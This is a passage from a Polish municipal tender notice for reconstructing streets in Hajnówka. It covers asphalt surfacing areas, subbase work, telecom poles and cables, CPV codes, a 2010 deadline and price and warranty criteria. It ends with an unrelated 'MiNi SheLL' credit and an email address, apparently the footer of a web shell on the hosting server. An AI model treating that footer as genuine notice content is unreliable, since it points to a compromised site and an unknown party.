         - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
           ścieralna)  na  łącznej  powierzchni  753,00 m2.
         - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
           ścieralna)  na  łącznej  powierzchni  541,68 m2  wraz  z  mechanicznym  wyprofilowaniem               
           i dogęszczeniem  do  gr. 20 cm  podbudowy  z  pospółki  wykonanej  przez  Zamawiającego. 
     c. ul. Topolowa :
         - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
           ścieralna)  na  powierzchni  566,39 m2  wraz  z  mechanicznym  wyprofilowaniem               
           i dogęszczeniem  do  gr. 20 cm  podbudowy  z  pospółki  wykonanej  przez  Zamawiającego. 
         - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 9 cm (warstwa  
           wiążąca)  na  powierzchni  13,00 m2.  
         - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
           ścieralna)  na  powierzchni  13,00 m2  
     d. ul. Spiralna :
         - nawierzchnia  z  mieszanki  mineralno - bitumicznej  asfaltowej  o  gr. 5 cm (warstwa  
           ścieralna)  na  powierzchni  950 m2  wraz  z  mechanicznym  wyprofilowaniem               
           i dogęszczeniem  do  gr. 20 cm  podbudowy  z  pospółki  wykonanej  przez  Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-2, 45.23.32.22-1, 45.31.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja (ponad 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa  ulic  miejskich  w  Hajnówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  Nr 3 :
                               Przebudowa  istniejących  urządzeń  telekomunikacyjnych :
     a. ul. Bez  nazwy  i  dojazd  do  wieży  ciśnień :
         -  montaż  i  ustawienie  słupów  pojedynczych  żelbetowych    -      2 szt.
         -  montaż  i  ustawienie  słupów  bliźniaczych  żelbetowych      -      1 szt.
         -  zawieszenie  kabli  nadziemnych                                             -   361 mb..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-2, 45.23.32.22-1, 45.31.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja (ponad 36 miesięcy) - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com